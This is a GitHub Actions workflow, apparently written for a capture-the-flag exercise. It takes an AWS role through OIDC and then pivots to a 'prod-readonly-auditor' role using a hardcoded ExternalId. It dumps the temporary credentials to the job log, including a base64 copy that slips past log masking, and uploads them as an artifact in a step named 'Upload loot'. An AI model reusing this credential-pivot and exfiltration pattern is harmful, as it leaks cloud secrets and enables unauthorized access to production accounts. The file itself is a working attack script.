name: configure aws creds

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  ScanVulns:
    runs-on: ubuntu-latest
    env:
      AWS_REGION: us-west-2

    steps:
      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::170974506515:role/github-deployment-role
          role-session-name: oidc-base
          aws-region: us-west-2

      - name: Who am I (base role)
        run: aws sts get-caller-identity

      - name: Assume prod-readonly-auditor with ExternalId
        id: assume_pivot
        run: |
          aws sts assume-role \
            --role-arn "arn:aws:iam::170974506515:role/prod-readonly-auditor" \
            --role-session-name "pivot-ctf" \
            --external-id "extidHX9F3A1" \
            > pivot_creds.json

          cat pivot_creds.json
          echo "PIVOT_CREDS_B64: $(base64 -w0 pivot_creds.json 2>/dev/null || base64 pivot_creds.json)"

          export AWS_ACCESS_KEY_ID=$(jq -r .Credentials.AccessKeyId pivot_creds.json)
          export AWS_SECRET_ACCESS_KEY=$(jq -r .Credentials.SecretAccessKey pivot_creds.json)
          export AWS_SESSION_TOKEN=$(jq -r .Credentials.SessionToken pivot_creds.json)

          # Save for artifact
          jq . pivot_creds.json > pivot_creds.pretty.json

      - name: List S3 objects in ci-deployment-logsv1
        run: |
          aws s3 ls s3://ci-deployment-logsv1/ --region us-west-2

      - name: Upload loot
        uses: actions/upload-artifact@v4
        with:
          name: pivot-role-creds
          path: pivot_creds.pretty.json
